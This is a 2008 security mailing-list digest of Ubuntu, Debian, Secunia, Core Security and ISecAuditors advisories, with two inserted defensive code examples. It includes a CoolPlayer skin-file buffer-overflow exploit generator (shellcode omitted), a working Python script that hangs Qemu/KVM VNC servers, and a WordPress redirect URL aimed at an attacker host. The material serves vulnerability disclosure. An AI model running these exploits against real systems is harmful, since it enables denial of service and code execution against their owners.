    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1-4ubuntu0.2.diff.gz
      Size/MD5:    13769 09820004bae28d3057000445482ef609
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1-4ubuntu0.2.dsc
      Size/MD5:      873 cf5b5d9869202da1a5aa29dbd57b31ab
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1.orig.tar.gz
      Size/MD5:   617750 7f389463afdb09310fa61e5036714bb3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.2_amd64.deb
      Size/MD5:   365988 53ecdab9240acf9b71e9beb9903ec7fc
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.2_amd64.deb
      Size/MD5:   214090 b379ee9c5d678cde9e6766df89695dba

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.2_i386.deb
      Size/MD5:   334468 907b6b0b7f11895b1b32b0886d7a9343
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.2_i386.deb
      Size/MD5:   205802 dc82a1e573a045e487e77dd8dae5fd65

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.2_lpia.deb
      Size/MD5:   341414 516b71217f39e0bc653d2862d1e1db19
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.2_lpia.deb
      Size/MD5:   209358 3cf0224915a3dd16199aafbb49e96c34

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.2_powerpc.deb
      Size/MD5:   362620 634e0878891c1e6308950333718c1bd4
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.2_powerpc.deb
      Size/MD5:   229886 b37e628289bf933f6cd8ecb4e8d6b3ac

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.2_sparc.deb
      Size/MD5:   338862 57c8a21576417e08d2b9b7c4e5ee8db1
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.2_sparc.deb
      Size/MD5:   200926 1f96efa5649dd902157fd7e1ea358a7b

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0-1ubuntu1.2.diff.gz
      Size/MD5:    56663 fb26ad4224322e4ede71f5d70a62638f
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0-1ubuntu1.2.dsc
      Size/MD5:      843 e80fb6a9f642fd8a5c0d4b82b4a20429
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0.orig.tar.gz
      Size/MD5:   845017 1f7f497798e06085767d645b0673562a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.2_amd64.deb
      Size/MD5:   344524 d023421c4725c4fadb076510ba28f0cb
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.2_amd64.deb
      Size/MD5:   199838 4a7b97363d6af1862911a576703b760a

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.2_i386.deb
      Size/MD5:   309450 b9a5eeb6b5ba08edc7252b25b2df1811
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.2_i386.deb
      Size/MD5:   190318 290fda5b18c7dae98526f38a9b324595

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.2_lpia.deb
      Size/MD5:   318168 6cfb7d6f677930908a2dfc4567b2ff7f
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.2_lpia.deb
      Size/MD5:   194220 05f1faaa12d4094a2622cfa70dff086e

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.2_powerpc.deb
      Size/MD5:   336314 665ed6ae263c147a59d4f94a199b0395
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.2_powerpc.deb
      Size/MD5:   211732 d97ee45ecc1b5300b5a8e7e1e9608496

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.2_sparc.deb
      Size/MD5:   314152 f14550d0965519dcc4d5b1c5bc435e64
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.2_sparc.deb
      Size/MD5:   181174 c48d4ebd678032ebfc55d19c72d613b5




Date: Mon, 22 Dec 2008 00:39:55 -0700
Message-Id: <200812220739.mBM7dtDD028105@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: writ3r-dont-want-bugtraq-spam-@gmail.com
To: bugtraq@securityfocus.com
Subject: CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit
Status:   

/*
* CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit
*
* Advisory: http://www.bmgsec.com.au/advisory/43/
* Test box: WinXP Pro SP2 English
*
* Code reference is in skin.c, lines 464 - 480
*
* Written and discovered by:
* r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
*/

#include <iostream>
#include <fstream>
#include <cstdlib> //exit

using namespace std;

int main()
{
    //win32_exec -  EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
    //Bad characters: 0x00, 0x0d, 0xf4
    char scode[] = ""; // encoded payload bytes omitted

    char buffer[1918];
    char eip[] = "\x27\x38\x03\x7d"; //jmp esp

    cout << "[*] Generating payload\n";
    strcpy(buffer, "[CoolPlayer Skin]\nPlaylistSkin=");

    int i;
    for (i=0; i<1534; i++)
        buffer[31+i] = 'A';

    for (i=0; i<sizeof(eip); i++)
        buffer[1565+i] = eip[i];

    for (i=0; i<sizeof(scode); i++)
        buffer[1569+i] = scode[i];

    ofstream outStream;
    outStream.open("cp.ini");

    outStream << buffer;

    outStream.close();

    cout << "[+] Skin file created.\n";

    return 0;
}

Date: Mon, 22 Dec 2008 17:07:31 +0100
From: Secunia Research <remove-vuln@secunia.com>
To: bugtraq@securityfocus.com
Subject: Secunia Research: Trend Micro HouseCall ActiveX Control Arbitrary Code Execution

=====================================================================
                     Secunia Research 22/12/2008

   - Trend Micro HouseCall ActiveX Control Arbitrary Code Execution -

=====================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

=====================================================================
1) Affected Software

* Trend Micro HouseCall ActiveX Control 6.51.0.1028 and 6.6.0.1278

NOTE: Other versions may also be affected.

=====================================================================
2) Severity

Rating: Highly critical
Impact: System compromise
Where:  Remote

=====================================================================
3) Vendor's Description of Software

"Trend Micro HouseCall is an application for checking whether your
computer has been infected by viruses, spyware, or other malware. 
HouseCall performs additional security checks to identify and fix 
vulnerabilities to prevent reinfection."

Product Link:
http://housecall.trendmicro.com/

=====================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Trend Micro 
HouseCall, which can be exploited by malicious people to compromise a 
user's system.

The vulnerability is caused due to an implementation error within the
HouseCall ActiveX control (Housecall_ActiveX.dll). This can be 
exploited to e.g. download and load an arbitrary library file by 
specifying a custom update server.

Successful exploitation allows execution of arbitrary code.

=====================================================================
5) Solution

Remove the ActiveX control and install version 6.6.0.1285.
http://prerelease.trendmicro-europe.com/hc66/launch/

HouseCall Server Edition:
Apply hotfix B1285.

=====================================================================
6) Time Table

18/08/2008 - Vendor notified.
19/08/2008 - Vendor response.
02/09/2008 - Vendor acknowledges vulnerability.
03/09/2008 - Vendor asks if version 6.6 is also affected.
03/09/2008 - Vendor informed that version 6.6 is not available.
09/09/2008 - Vendor informs that version 6.6 site is now accessible.
18/09/2008 - Vendor informed that version 6.6 is not affected by the
             current exploit, but will be checked in-depth later.
23/09/2008 - Vendor informed that version 6.6 is also vulnerable
             when using a slightly modified exploit.
27/09/2008 - Vendor provides status update.
13/11/2008 - Status update requested.
13/11/2008 - Vendor provides status update.
14/11/2008 - Vendor provides hotfix for testing.
14/11/2008 - Informed the vendor that the supplied hotfix does not 
             address the vulnerability properly.
18/11/2008 - Vendor requests updated exploit.
19/11/2008 - Updated exploit sent to the vendor.
22/12/2008 - Status update requested.
22/12/2008 - Vendor informs that hotfix for SA31583 also fixes this
             vulnerability.
22/12/2008 - Public disclosure.

=====================================================================
7) Credits

Discovered by Alin Rad Pop, Secunia Research.

=====================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2008-2434 for the vulnerability.

=====================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

=====================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-32/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

=====================================================================

Date: Mon, 22 Dec 2008 09:35:54 -0500
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Subject: [USN-698-1] Nagios vulnerability

===========================================================
Ubuntu Security Notice USN-698-1          December 22, 2008
nagios vulnerability
CVE-2008-5027
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  nagios-common                   2:1.3-cvs.20050402-8ubuntu8

After a standard system upgrade you need to restart Nagios to effect
the necessary changes.

Details follow:

It was discovered that Nagios did not properly parse commands submitted using
the web interface. An authenticated user could use a custom form or a browser
addon to bypass security restrictions and submit unauthorized commands.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios_1.3-cvs.20050402-8ubuntu8.diff.gz
      Size/MD5:    70914 96d8036bdb33aadd3141715039c91b24
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios_1.3-cvs.20050402-8ubuntu8.dsc
      Size/MD5:      959 0393336015bf452f5dfeb74d75245311
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios_1.3-cvs.20050402.orig.tar.gz
      Size/MD5:  1621251 0f92b7b8e705411b7881d3650cbb5d56

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-common_1.3-cvs.20050402-8ubuntu8_all.deb
      Size/MD5:  1218132 d18e298ee16f4c6c6b7c5969c46044e6

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-cvs.20050402-8ubuntu8_amd64.deb
      Size/MD5:  1030206 085483fdefd0d7bc43e55dbc5be2bcd6
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-cvs.20050402-8ubuntu8_amd64.deb
      Size/MD5:  1041656 09fc7bb2ff11062603680d09e290909b
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-cvs.20050402-8ubuntu8_amd64.deb
      Size/MD5:  1025618 61619d13effd9a4970486abf5933c756

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-cvs.20050402-8ubuntu8_i386.deb
      Size/MD5:   877846 544afaebec24e7e94d2ce1da3a89346c
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-cvs.20050402-8ubuntu8_i386.deb
      Size/MD5:   886544 411d3ca5a204aa41a4a42ef6e5f56453
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-cvs.20050402-8ubuntu8_i386.deb
      Size/MD5:   872936 aa31f6d1fb8a081a206eae3d6bfb3dd6

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-cvs.20050402-8ubuntu8_powerpc.deb
      Size/MD5:  1015630 540a27062c7f8612b7f460b2bcfd93b9
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-cvs.20050402-8ubuntu8_powerpc.deb
      Size/MD5:  1024374 47e0480006df0b20a83f67b56da7a9f8
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-cvs.20050402-8ubuntu8_powerpc.deb
      Size/MD5:   993324 03a67a7675075050a672a4c515e8e0c3

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-cvs.20050402-8ubuntu8_sparc.deb
      Size/MD5:   918810 7340348f043dd884c88bd016ee30e41d
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-cvs.20050402-8ubuntu8_sparc.deb
      Size/MD5:   926172 e9ccf388b828a17e868807aa39cb5b51
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-cvs.20050402-8ubuntu8_sparc.deb
      Size/MD5:   917374 c88dec0d93f590f8a93ebbc701696f68





Date: Mon, 22 Dec 2008 15:30:28 -0200
From: CORE Security Technologies Advisories <advisories@coresecurity.com>
To: Bugtraq <bugtraq@securityfocus.com>, Vulnwatch <vulnwatch@vulnwatch.org>, full-disclosure@lists.grok.org.uk
Subject: CORE-2008-1210: Qemu and KVM VNC server remote DoS

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/

            Qemu and KVM VNC server remote DoS



1. *Advisory Information*

Title: Qemu and KVM VNC server remote DoS
Advisory ID: CORE-2008-1210
Advisory URL: http://www.coresecurity.com/content/vnc-remote-dos
Date published: 2009-12-22
Date of last update: 2008-12-19
Vendors contacted: Qemu and KVM teams
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Denial of service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 32910
CVE Name: N/A


3. *Vulnerability Description*

The VNC server of the Qemu and KVM virtualization solutions is vulnerable
to a remote DoS: specially crafted packets received by the host VNC
server cause an infinite loop.

Successful exploitation causes the host server to enter an infinite loop
and cease to function. The vulnerability can be triggered remotely by
external hosts or virtualized guests. No special privileges are required
to perform the Denial of Service.


4. *Vulnerable packages*

   . Qemu 0.9.1 and older
   . kvm-79 and older


5. *Vendor Information, Solutions and Workarounds*

Qemu and KVM teams will release patches that fix this vulnerability.


6. *Credits*

This vulnerability was discovered and researched by Alfredo Ortega from
Core Security Technologies.


7. *Technical Description / Proof of Concept Code*

The function 'protocol_client_msg()' in the file 'vnc.c' ('qemu/vnc.c'
in kvm-66) is in charge of processing incoming VNC low-level messages. A
listing of the vulnerable source follows:

/-----------

vnc.c
1185: static int protocol_client_msg(VncState *vs, uint8_t *data, size_t len)
1186: {
1187:     int i;
1188:     uint16_t limit;
1189:
1190:     switch (data[0]) {

...

1201:     case 2:
1202:         if (len == 1)
1203:             return 4;
1204:
1205:         if (len == 4)
1206:             return 4 + (read_u16(data, 2) * 4);

-----------/

 When the VNC server receives a message consisting of '\x02\x00\x00\x00'
the 'read_u16()' function will return zero, and an infinite loop will be
triggered, because this function will be called with the len parameter
always equal to 4.


7.1. *Proof of Concept*

The following python script implements a basic VNC client that triggers
the vulnerability on the VNC server.

*NOTE:* Some VNC servers like KVM, don't bind to 0.0.0.0 by default, but
the server can still be reached from a guest VM when no VNC client is
attached.


/-----------

Example:

Launch vulnerable qemu:

~$qemu ./test.img -vnc 0.0.0.0:0

Launch attack:

~$python qemu-kvm-DoS.py localhost 5900

-----------/



/-----------

##
## vnc remote DoS
##

import socket
import time
import struct
import sys

if len(sys.argv)<3:
    print "Usage: %s host port" % sys.argv[0]
    exit(0)

host = sys.argv[1] # "127.0.0.1" # debian 4
port = int(sys.argv[2]) # 5900

s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
# rec-send versions
srvversion = s.recv(100)
cliversion=srvversion
s.send(cliversion)
print "Server version: %s" % srvversion

#Security types

sec=s.recv(100)
print "Number of security types: %d" % ord(sec[0])
s.send(sec[1])

# Authentication result
auth=s.recv(100)
if auth=="\x00\x00\x00\x00":
    print "Auth ok."

# Share desktop flag: no
s.send("\x00")

# Server framebuffer parameters:
framebuf=s.recv(100)

# Trigger the bug
s.send("\x02\x00\x00\x00\x00\xff"+struct.pack("<L",1)*5)

s.close()

-----------/



8. *Report Timeline*

. 2008-12-10: Core Security Technologies notifies the Qemu, Xen and KVM
teams of the vulnerability.
. 2008-12-11: KVM team acknowledges notification.
. 2008-12-12: Core sends technical details of the vulnerability to the
KVM team.
. 2008-12-13: KVM team informs that it will inform the Qemu team, since
the vulnerable code is inherited from Qemu.
. 2008-12-16: Core replies that the vulnerability is present in Qemu,
KVM and Xen, and that its intention is to coordinate the disclosure of
this issue with the three teams. The proposed publication date is
January 5th, 2009.
. 2008-12-16: Xen team acknowledges notification.
. 2008-12-16: Core sends technical details to the Xen team.
. 2008-12-16: Qemu team confirms the vulnerability, and has patches ready.
. 2008-12-17: Xen informs that they are not vulnerable.
. 2008-12-17: Core proposes to disclose the issue on December 22nd,
2008, if both Qemu and KVM have patches ready.
. 2008-12-18: Qemu and KVM teams agree to publish the issue on Dec 22.
. 2008-12-22: The advisory CORE-2008-1210 is published.


9. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


10. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


11. *Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


12. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
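
The stall described in section 7 of the CORE-2008-1210 advisory above, reduced to a self-contained C model. This is an added example, not code from Qemu, KVM or Core Security: only the `len == 1` / `len == 4` logic follows the advisory's listing, while the `drive()` read loop, its `guard` flag, the hardened handler and the sample inputs are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* RFB fields are big-endian. */
static uint16_t read_u16(const uint8_t *data, size_t off)
{
    return (uint16_t)((data[off] << 8) | data[off + 1]);
}

/* Length logic for message type 2, following the advisory's listing.
 * Returns 0 when the message is complete, otherwise the total number of
 * bytes the handler wants before it is called again. */
static size_t type2_vulnerable(const uint8_t *data, size_t len)
{
    if (len == 1)
        return 4;
    if (len == 4)
        return 4 + (size_t)read_u16(data, 2) * 4; /* count 0: asks for 4 again */
    return 0;
}

/* Hardened variant (an assumption, not the vendor patch): a zero count
 * means the 4-byte header is already the whole message. */
static size_t type2_hardened(const uint8_t *data, size_t len)
{
    if (len == 1)
        return 4;
    if (len == 4) {
        uint16_t count = read_u16(data, 2);
        if (count > 0)
            return 4 + (size_t)count * 4;
    }
    return 0;
}

typedef size_t (*handler_fn)(const uint8_t *data, size_t len);

enum { STALLED = -1, NO_PROGRESS = -2, TOO_LONG = -3 };

/* Hypothetical model of a read loop driving such a handler. It calls the
 * handler whenever at least `expect` bytes are buffered. `max_calls` stands
 * in for "loops forever"; `guard` enables a defence-in-depth check that
 * rejects any handler result that does not ask for more bytes than it
 * already has. Returns the number of handler calls or a negative code. */
static int drive(handler_fn h, const uint8_t *in, size_t in_len,
                 int max_calls, int guard)
{
    uint8_t buf[64];
    size_t avail = in_len, expect = 1;
    int calls = 0;

    if (in_len > sizeof(buf))
        return TOO_LONG;
    memcpy(buf, in, in_len);

    while (avail >= expect) {
        size_t want;

        if (calls == max_calls)
            return STALLED;
        calls++;
        want = h(buf, expect);
        if (want == 0) {                 /* message consumed: drop it */
            memmove(buf, buf + expect, avail - expect);
            avail -= expect;
            expect = 1;
        } else if (guard && want <= expect) {
            return NO_PROGRESS;          /* would spin: protocol error */
        } else {
            expect = want;
        }
    }
    return calls;
}

int main(void)
{
    /* Constructed inputs: the 4-byte message named in the advisory text
     * and a well-formed message carrying one 4-byte entry. */
    static const uint8_t zero[] = { 0x02, 0x00, 0x00, 0x00 };
    static const uint8_t one[]  = { 0x02, 0x00, 0x00, 0x01, 0, 0, 0, 5 };

    printf("vulnerable, zero count:          %d\n",
           drive(type2_vulnerable, zero, sizeof zero, 1000, 0));
    printf("vulnerable + loop guard, zero:   %d\n",
           drive(type2_vulnerable, zero, sizeof zero, 1000, 1));
    printf("hardened, zero count:            %d\n",
           drive(type2_hardened, zero, sizeof zero, 1000, 1));
    printf("hardened, one entry:             %d\n",
           drive(type2_hardened, one, sizeof one, 1000, 1));
    return 0;
}
```

The guard in `drive()` is independent of the handler fix: it turns any handler that fails to make progress into a connection error instead of a busy loop.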

Date: Sun, 21 Dec 2008 15:24:42 +0100 (CET)
From: joey@infodrom.org (Martin Schulze)
To: bugtraq@securityfocus.com
Subject: [SECURITY] [DSA 1689-1] New proftpd-dfsg packages fix Cross-Site Request Forgery

--------------------------------------------------------------------------
Debian Security Advisory DSA 1689-1                    security@debian.org
http://www.debian.org/security/                             Martin Schulze
December 21st, 2008                     http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : proftpd-dfsg
Vulnerability  : missing input validation
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2008-4242
Debian Bug     : 502674
BugTraq ID     : 31289

Maksymilian Arciemowicz of securityreason.com reported that ProFTPD is
vulnerable to cross-site request forgery (CSRF) attacks and executes
arbitrary FTP commands via a long ftp:// URI that leverages an
existing session from the FTP client implementation in a web browser.

For the stable distribution (etch) this problem has been fixed in
version 1.3.0-19etch2 and in version 1.3.1-15~bpo40+1 for backports.

For the testing (lenny) and unstable (sid) distributions this problem
has been fixed in version 1.3.1-15.

We recommend that you upgrade your proftpd-dfsg package.


Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
-------------------------------



  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>


Date: Mon, 22 Dec 2008 18:36:14 +0100
From: ISecAuditors Security Advisories <advisories@isecauditors.com>
Subject: [ISecAuditors Security Advisories] Wordpress is vulnerable to an
 unauthorized upgrade and XSS

============================================
INTERNET SECURITY AUDITORS ALERT 2008-001
- Original release date: January 3rd, 2008
- Last revised:  December 22nd, 2008
- Discovered by: Jesus Olmos Gonzalez
- Severity: 2/5
============================================
I. VULNERABILITY
-------------------------
Wordpress is vulnerable to an unauthorized upgrade and XSS

II. BACKGROUND
-------------------------
WordPress started in 2003 with a single bit of code to enhance the
typography of everyday writing and with fewer users than you can count
on your fingers and toes. Since then it has grown to be the largest
self-hosted blogging tool in the world, used on hundreds of thousands
of sites and seen by tens of millions of people every day. With a very
active development and evolution.

III. DESCRIPTION
-------------------------
If the WordPress installation is not the latest version, anybody can
upgrade the application using wp-admin/upgrade.php

The snippet of vulnerable code:

if (isset($_GET['step']))
        $step = (int) $_GET['step'];
...
switch($step) :
    case 0:
        $goback = clean_url(stripslashes(wp_get_referer()));
...
    case 1:
        wp_upgrade();
        if ( empty( $_GET['backto'] ) )
           $backto = __get_option('home') . '/';
...

If step is set to 1, the "Have fun" link is set to the value of the
backto parameter, so it is possible to mount a cross-site attack to
steal user sessions.

IV. PROOF OF CONCEPT
-------------------------
http://www.victim.com/wp-admin/upgrade.php
http://www.victim.com/wp-admin/upgrade.php?step=1&backto=http://www.The-attacker.org

V. BUSINESS IMPACT
-------------------------
If the upgrade fails, the availability of the WordPress site could be
affected. If the cross-site attack succeeds, the confidentiality and
integrity of the content will be affected.

VI. SYSTEMS AFFECTED
-------------------------
All versions of WordPress are affected.

VII. SOLUTION
-------------------------
WordPress considered the issue not as serious as it seems, so no patch
has been published for this issue.

VIII. REFERENCES
-------------------------
http://www.wordpress.org

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
December 21, 2007: Initial release
January   7, 2008: More details added.

XI. DISCLOSURE TIMELINE
-------------------------
December 21, 2007: Vulnerability acquired by
                   Internet Security Auditors (www.isecauditors.com)
January   6, 2008: WordPress security contacted.
January  11, 2008: WordPress security confirms they consider the
                   vulnerability as low impact.
December 22, 2008: Published

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.
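
Added example (not part of the advisory and not WordPress code): one way to constrain a link target such as the backto parameter described in section III to the site's own host and to escape it before it is written into the "Have fun" link. The function names safe_backto and render_backto_link and the blog.example host are hypothetical and constructed for illustration.

```php
<?php
// Added example: hypothetical helpers, not taken from WordPress.

/**
 * Return $candidate only if it is an absolute http(s) URL on the same
 * host and port as $home; otherwise return $home with a trailing slash.
 */
function safe_backto(string $candidate, string $home): string
{
    $fallback = rtrim($home, '/') . '/';

    // Reject empty input, control characters, spaces and backslashes:
    // browsers may normalise these differently from parse_url().
    if ($candidate === '' || preg_match('/[\x00-\x20\x7f\\\\]/', $candidate)) {
        return $fallback;
    }

    $c = parse_url($candidate);
    $h = parse_url($home);
    if ($c === false || $h === false || empty($c['host']) || empty($h['host'])) {
        return $fallback;
    }

    // Require an explicit http/https scheme. This excludes javascript:,
    // data: and scheme-relative targets such as //other.example/.
    $scheme = strtolower($c['scheme'] ?? '');
    if ($scheme !== 'http' && $scheme !== 'https') {
        return $fallback;
    }

    // No userinfo component (http://blog.example@other.example/).
    if (isset($c['user']) || isset($c['pass'])) {
        return $fallback;
    }

    // Host names compare case-insensitively. The port must match exactly,
    // so an explicit :80 is treated as different from no port (strict on
    // purpose; relax only if the site really uses both forms).
    $sameHost = strcasecmp($c['host'], $h['host']) === 0;
    $samePort = ($c['port'] ?? null) === ($h['port'] ?? null);

    return ($sameHost && $samePort) ? $candidate : $fallback;
}

/**
 * Build the link with the validated target, escaped for an HTML
 * attribute so quotes in the value cannot close the href.
 */
function render_backto_link(string $candidate, string $home): string
{
    $url = safe_backto($candidate, $home);
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">Have fun!</a>';
}

// Constructed sample inputs: the first is kept, the rest fall back to home.
$home = 'http://blog.example';
$samples = [
    'http://blog.example/wp-admin/',
    'http://other.example/',
    '//other.example/',
    'javascript:alert(1)',
    'http://blog.example@other.example/',
];
foreach ($samples as $in) {
    echo str_pad($in, 40), ' => ', render_backto_link($in, $home), "\n";
}
```

This covers only the link target; the unauthenticated call to wp_upgrade() at step 1 is a separate access-control question that the example does not address.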

From: Florian Weimer <fw@deneb.enyo.de>
Date: Mon, 22 Dec 2008 07:49:55 +0100
Subject: [SECURITY] [DSA 1690-1] New avahi packages fix denial of service

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

